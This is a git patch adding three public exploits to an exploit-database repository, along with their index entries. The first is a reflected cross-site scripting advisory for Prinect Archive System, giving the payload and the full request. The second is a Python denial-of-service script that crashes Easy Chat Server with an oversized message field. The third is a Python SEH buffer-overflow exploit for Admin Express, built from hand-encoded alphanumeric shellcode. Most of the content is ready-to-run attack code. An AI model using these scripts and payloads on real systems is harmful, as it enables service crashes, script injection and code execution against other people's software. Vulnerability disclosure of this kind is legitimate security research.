From 6822a23f820782c8e9f1a1fd858fc91db79d2b20 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 8 May 2019 05:02:04 +0000 Subject: [PATCH] DB: 2019-05-08 3 changes to exploits/shellcodes Easy Chat Server 3.1 - 'message' Denial of Service (PoC) Admin Express 1.2.5.485 - 'Folder Path' Local SEH Alphanumeric Encoded Buffer Overflow Prinect Archive System 2015 Release 2.6 - Cross-Site Scripting --- exploits/multiple/webapps/46804.txt | 98 +++++++++++++++++++++++ exploits/windows/dos/46806.py | 65 ++++++++++++++++ exploits/windows/local/46805.py | 116 ++++++++++++++++++++++++++++ files_exploits.csv | 3 + 4 files changed, 282 insertions(+) create mode 100644 exploits/multiple/webapps/46804.txt create mode 100755 exploits/windows/dos/46806.py create mode 100755 exploits/windows/local/46805.py diff --git a/exploits/multiple/webapps/46804.txt b/exploits/multiple/webapps/46804.txt new file mode 100644 index 000000000..b6cde369e --- /dev/null +++ b/exploits/multiple/webapps/46804.txt @@ -0,0 +1,98 @@ +Details +================ +Software: Prinect Archive System +Version: v2015 Release 2.6 +Homepage: https://www.heidelberg.com +Advisory report: https://github.com/alt3kx/CVE-2019-10685 +CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10685 +CVSS: 6.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N +CWE-79 + +Description +================ +A Reflected Cross Site Scripting (XSS) Vulnerability was discovered in Print Archive System v2015 release 2.6 + +Vulnerability +================ +The user supplied input containing JavaScript is echoed back in JavaScript code in an HTML response via the "TextField" parameter. + +Proof of concept +================ + +Reflected XSS +Payload: %3cscript%3ealert(1)%3c%2fscript%3e + +The offending GET request is: + +GET /am/Login,loginForm.sdirect?formids=TextField%2cTextField_0%2clink&submitmode=&submitname=&TextField=%3cscript%3ealert(1)%3c%2fscript%3e&TextField_0=l0V%21i1s%21C2 HTTP/1.1 +Host: victim_IP:8090 +Accept-Encoding: gzip, deflate +Accept: */* +Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36 +Connection: close +Cookie: JSESSIONID=C665EA9A7594E736D39C93EA8763A01F + +Reflected XSS Reponse: + +HTTP/1.1 200 OK +Server: Apache-Coyote/1.1 +Content-Type: text/html;charset=UTF-8 +Date: Mon, 04 Feb 2019 13:15:12 GMT +Connection: close + +[../snip] + +id="msgContainer">Authentication failed for:
Click Help button for more information about login permissions. + +# curl -i -s -k -X GET + +-H "Host: victim:8090" +-H "Accept-Encoding: gzip, deflate" +-H "Accept: */*" +-H "Accept-Language: en-US,en-GB;q=0.9,en;q=0.8" +-H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" +-H "Connection: close" +-H "Cookie: JSESSIONID=C665EA9A7594E736D39C93EA8763A01F" +-b "JSESSIONID=C665EA9A7594E736D39C93EA8763A01F" +"http://victim:8090/am/Login,loginForm.sdirect?formids=TextField%2cTextField_0%2clink&submitmode=&submitname=&TextField=%3cscript%3ealert(1)%3c%2fscript%3e&TextField_0=l0V%21i1s%21C2" +--proxy http://127.0.0.1:8080 + +Final payload into URL: + +http://victim_IP:8090/am/Login,loginForm.sdirect?formids=TextField%2cTextField_0%2clink&submitmode=&submitname=&TextField=%3cscript%3ealert(1)%3c%2fscript%3e&TextField_0=l0V%21i1s%21C2 + +Mitigations +================ +No more feedback from the vendor: +https://www.heidelberg.com + +Disclosure policy +================ +We believes in responsible disclosure. +Please contact us on Alex Hernandez aka alt3kx (at) protonmail com to acknowledge this report. + +This vulnerability will be published if we do not receive a response to this report with 10 days. + +Timeline +================ + +2019-02-04: Discovered +2019-02-25: Retest PRO environment +2019-03-25: Retest on researcher's ecosystem +2019-04-02: Vendor notification +2019-04-03: Vendor feedback received +2019-04-08: Reminder sent +2019-04-08: 2nd reminder sent +2019-04-11: Internal communication +2019-04-26: No more feedback received from the vendor +2019-05-30: New issues found +2019-06-30: Public Disclosure + +Discovered by: +Alex Hernandez aka alt3kx: +================ +Please visit https://github.com/alt3kx for more information. + +My current exploit list @exploit-db: +https://www.exploit-db.com/author/?a=1074 & https://www.exploit-db.com/author/?a=9576 \ No newline at end of file diff --git a/exploits/windows/dos/46806.py b/exploits/windows/dos/46806.py new file mode 100755 index 000000000..bdc9d9d7f --- /dev/null +++ b/exploits/windows/dos/46806.py @@ -0,0 +1,65 @@ +#!/usr/bin/python +#--------------------------------------------------------- +# Title: Easy Chat Server Version 3.1 - (DOS) +# Date: 2019-05-07 +# Author: Miguel Mendez Z +# Team: www.exploiting.cl +# Vendor: http://www.echatserver.com +# Software Link: http://www.echatserver.com/ecssetup.exe +# Platforms: Windows +# Version: 3.1 +# Tested on: Windows Windows 7_x86/7_x64 [eng] +#--------------------------------------------------------- +# +# 1- Primer socket con (GET) generamos una sesion valida para luego hacer el paso 2. +# 2- Segundo enviamos (POST) la data en la variable message para crashear la aplicacion. + +import os, sys, socket +from time import sleep + +ip = '127.0.0.1' +padding = 'A' * 8000 + +GET = ( +"GET /chat.ghp?username=1&password=&room=1&sex=1 HTTP/1.1\r\n" +"User-Agent: Mozilla/4.0\r\n" +"Host: "+str(ip)+":80\r\n" +"Accept-Language: en-us\r\n" +"Accept-Encoding: gzip, deflate\r\n" +"Referer: http://"+str(ip)+"\r\n" +"Connection: Keep-Alive\r\n\r\n" +) + +try: + print "\n [*] Ejecutando payload GET (Creando Sesion) - length " + str(len(GET)) + s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s1.connect((ip, 80)) + s1.send(GET) + s1.recv(1024) + s1.close() +except: + print "Sin conexion GET" + +sleep(3) + +POST = ( +"POST /body2.ghp?username=1&password=&room=1 HTTP/1.1\r\n" +"Host: "+str(ip)+"\r\n" +"User-Agent: Mozilla/4.0\r\n" +"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" +"Accept-Language: es-CL,en-US;q=0.5\r\n" +"Accept-Encoding: gzip, deflate\r\n" +"Referer: http://"+str(ip)+"/chatsubmit.ghp?username=1&password=&room=1\r\n" +"Content-Type: application/x-www-form-urlencoded\r\n\r\n" +"staticname=%3A000539&tnewname=&msayinfo=1&mnewname=&mtowho=All&mfilters=0&mfont=0&mfcolor=1&elist=&seltype=Theme&msg=&Submit=Send&sc=on¬ifysound=on&message="+str(padding)+"&chat_flag=" +) + +try: + print " [*] Ejecutando payload POST (Crashing) - length " + str(len(POST)) + s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s2.connect((ip, 80)) + s2.send(POST) + s2.recv(1024) + s2.close() +except: + print "Sin conexion POST" \ No newline at end of file diff --git a/exploits/windows/local/46805.py b/exploits/windows/local/46805.py new file mode 100755 index 000000000..d5823d20d --- /dev/null +++ b/exploits/windows/local/46805.py @@ -0,0 +1,116 @@ +# Title: Admin Express v1.2.5.485 Folder Path Local SEH Alphanumeric Encoded Buffer Overflow +# Date: May 6th, 2019 +# Author: Connor McGarr (https://connormcgarr.github.io) +# Vendor Homepage: https://admin-express.en.softonic.com/ +# Software Link: https://admin-express.en.softonic.com/download +# Version v1.2.5.485 +# Tested on: Windows XP SP3 EN + +# TO RUN: +# 1. Run python script +# 2. Copy contents of pwn.txt +# 3. Open AdminExpress +# 4. Select System Compare +# 5. Paste contents into Folder Path on the left hand side +# 6. Press the scale icon in the middle of the screen, under the Services and Running Processes tabs + + +# This got a bit hairy. We manually encoded our shellcode, and we had to use the sub method for each encode. +# 05 was a bad char for us, which was an add eax opcode. We could use (in hex) 1-4,6,10-7E and this was an odd character set. + +# calc.exe shellcode: +# "\x31\xc9\x51\x68" +# "\x63\x61\x6c\x63" +# "\x54\xB8\xc7\x93" +# "\xc2\x77\xff\xd0" +# Can replace with a shell, if you are willing to do the encoding and decoding math :-) Too preoccupied for now, so here is a calc.exe + +# For zeroing out registers before manual shellcode +zero = "\x25\x01\x01\x01\x01" # and eax, 0x01010101 +zero += "\x25\x10\x10\x10\x10" # and eax, 0x10101010 + +# For restoring stack pointer before execution of shellcode, due to +# old stack pointer value needed. This puts 0x0012DC98 into ECX, to be used later +restore = "\x54" # push esp; (pushing the current value of ESP, which needs to be restored later, onto the stack) +restore += "\x59" # pop ecx; (holding the value of old ESP in ECX, to be called later.) +restore += "\x51" # push ecx; (to get the value on the stack for the mov esp command later) + +# Stack alignment +# Need to make ESP 0x012F3F4. Using sub method to write that value onto the stack. +# AFter making ESP 0x012F3F4, it should be the same value as EAX- so we can write up the stack. +alignment = "\x54" # push esp +alignment += "\x58" # pop eax; (puts the value of ESP into EAX) + +# Write these 3 sub values in normal format, since memory address, not instruction to be executed. +# 364D5555 364D5555 364E5555 +alignment += "\x2d\x38\x4d\x55\x55" # sub eax, 0x384D5555 +alignment += "\x2d\x36\x4d\x55\x55" # sub eax, 0x364D5555 +alignment += "\x2d\x36\x4e\x55\x55" # sub eax, 0x364E5555 +alignment += "\x50" # push eax +alignment += "\x5c" # pop esp; (puts the value of eax back into esp) + +# calc.exe shellcode, via the sub method. Values needed are as followed. Reference the calc.exe shellcode line for line numbers. +# 1st line = 2C552D14 01562D14 01562E16 +shellcode = zero +shellcode += "\x2d\x14\x2d\x55\x2c" # sub eax, 0x2C552D14 +shellcode += "\x2d\x14\x2d\x55\x01" # sub eax, 0x01562D14 +shellcode += "\x2d\x16\x2e\x56\x01" # sub eax, 0x01562E16 +shellcode += "\x50" # push eax; (get the value on the stack). We will do this for all remaining steps like this one. + +# 2nd line = 24121729 24121739 2414194A +shellcode += zero +shellcode += "\x2d\x29\x17\x12\x24" # sub eax, 0x24121729 +shellcode += "\x2d\x39\x17\x12\x24" # sub eax, 0x24121739 +shellcode += "\x2d\x4a\x19\x14\x24" # sub eax, 0x2414194A (was 40 at the end, but a miscalc happened. Changed to 4A) +shellcode += "\x50" # push eax + +# 3rd line = 34313635 34313434 34313434 +shellcode += zero +shellcode += "\x2d\x35\x36\x31\x34" # sub eax, 0x34313635 +shellcode += "\x2d\x34\x34\x31\x34" # sub eax, 0x34313434 +shellcode += "\x2d\x34\x34\x31\x34" # sub eax, 0x34313434 +shellcode += "\x50" # push eax + +# 4th line = 323A1245 323A1245 333A1245 +shellcode += zero +shellcode += "\x2d\x45\x12\x3a\x32" # sub eax, 0x323A1245 +shellcode += "\x2d\x45\x12\x3a\x32" # sub eax, 0x323A1245 +shellcode += "\x2d\x45\x12\x3a\x33" # sub eax, 0x333A1245 +shellcode += "\x50" # push eax + +# We need to restore the old ESP value of 0x0012DC98 to spawn calc.exe. Since it is a syscall, +# We need the ESP value before execution. We will do this by performing MOV ECX, ESP (remember ECX contains old ESP!) +# Here are the 3 values: 3F3F2711 3F3F2711 3F3F2811 +# For some reason the application changed some of my math. 3F3F2811 was supposed to be +# 403F3F2811 and so I changed it by 1 hex byte to get the CC (was getting CD) +move = zero +move += "\x2d\x40\x3f\x27\x11" # sub eax, 0x3F3F2711 +move += "\x2d\x3f\x3f\x27\x11" # sub eax, 0x3F3F2711 +move += "\x2d\x3f\x3f\x28\x11" # sub eax, 0x3F3F2811 +move += "\x50" # push eax + +# All together now. +payload = "\x41" * 4260 +payload += "\x70\x7e\x71\x7e" # JO 126 hex bytes. If jump fails, default to JNO 126 hex bytes +payload += "\x42\x4c\x01\x10" # 0x10014c42 pop pop ret wmiwrap.DLL + +# There are 2 NULL (\x00) terminators in our buffer of A's, near our nSEH jump. We are going to jump far away from them +# so we have enough room for our shellcode and to decode. +payload += "\x41" * 122 # add padding since we jumped 7e (126 bytes) above +payload += "\x70\x7e\x71\x7e" # JO or JNO another 126 bytes, so shellcode can decode +payload += "\x41" * 124 +payload += "\x70\x7e\x71\x7e" # JO or JNO another 126 bytes, so shellcode can decode +payload += "\x41" * 124 +payload += "\x70\x79\x71\x79" # JO or JNO only 121 bytes +payload += "\x41" * 121 # NOP is in the restricted chars. Using \x41 as a slide into alignment +payload += restore +payload += alignment +payload += shellcode +payload += move +payload += "\x43" * (5000-len(payload)) + +print payload + +f = open('pwn.txt', 'w') +f.write(payload) +f.close() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 886dff79b..11fba4ea6 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6409,6 +6409,7 @@ id,file,description,date,author,type,platform,port 46781,exploits/linux/dos/46781.txt,"Linux - Missing Locking Between ELF coredump code and userfaultfd VMA Modification",2019-04-30,"Google Security Research",dos,linux, 46793,exploits/windows/dos/46793.txt,"SolarWinds DameWare Mini Remote Control 10.0 - Denial of Service",2019-05-03,"Dino Barlattani",dos,windows, 46803,exploits/ios/dos/46803.c,"iOS 12.1.3 - 'cfprefsd' Memory Corruption",2019-05-06,ZecOps,dos,ios, +46806,exploits/windows/dos/46806.py,"Easy Chat Server 3.1 - 'message' Denial of Service (PoC)",2019-05-07,"Miguel Mendez Z",dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -10453,6 +10454,7 @@ id,file,description,date,author,type,platform,port 46756,exploits/windows/local/46756.rb,"RARLAB WinRAR 5.61 - ACE Format Input Validation Remote Code Execution (Metasploit)",2019-04-25,Metasploit,local,windows, 46779,exploits/windows/local/46779.py,"DeviceViewer 3.12.0.1 - 'user' SEH Overflow",2019-04-30,"Hayden Wright",local,windows, 46802,exploits/windows/local/46802.txt,"NSClient++ 0.5.2.35 - Privilege Escalation",2019-05-06,bzyo,local,windows, +46805,exploits/windows/local/46805.py,"Admin Express 1.2.5.485 - 'Folder Path' Local SEH Alphanumeric Encoded Buffer Overflow",2019-05-07,"Connor McGarr",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -41231,3 +41233,4 @@ id,file,description,date,author,type,platform,port 46796,exploits/multiple/webapps/46796.txt,"ReadyAPI 2.5.0 / 2.6.0 - Remote Code Execution",2019-05-06,"Gilson Camelo",webapps,multiple, 46798,exploits/php/webapps/46798.txt,"PHPads 2.0 - 'click.php3?bannerID' SQL Injection",2019-05-06,"felipe andrian",webapps,php,80 46799,exploits/asp/webapps/46799.txt,"microASP (Portal+) CMS - 'pagina.phtml?explode_tree' SQL Injection",2019-05-06,"felipe andrian",webapps,asp,80 +46804,exploits/multiple/webapps/46804.txt,"Prinect Archive System 2015 Release 2.6 - Cross-Site Scripting",2019-05-07,alt3kx,webapps,multiple,80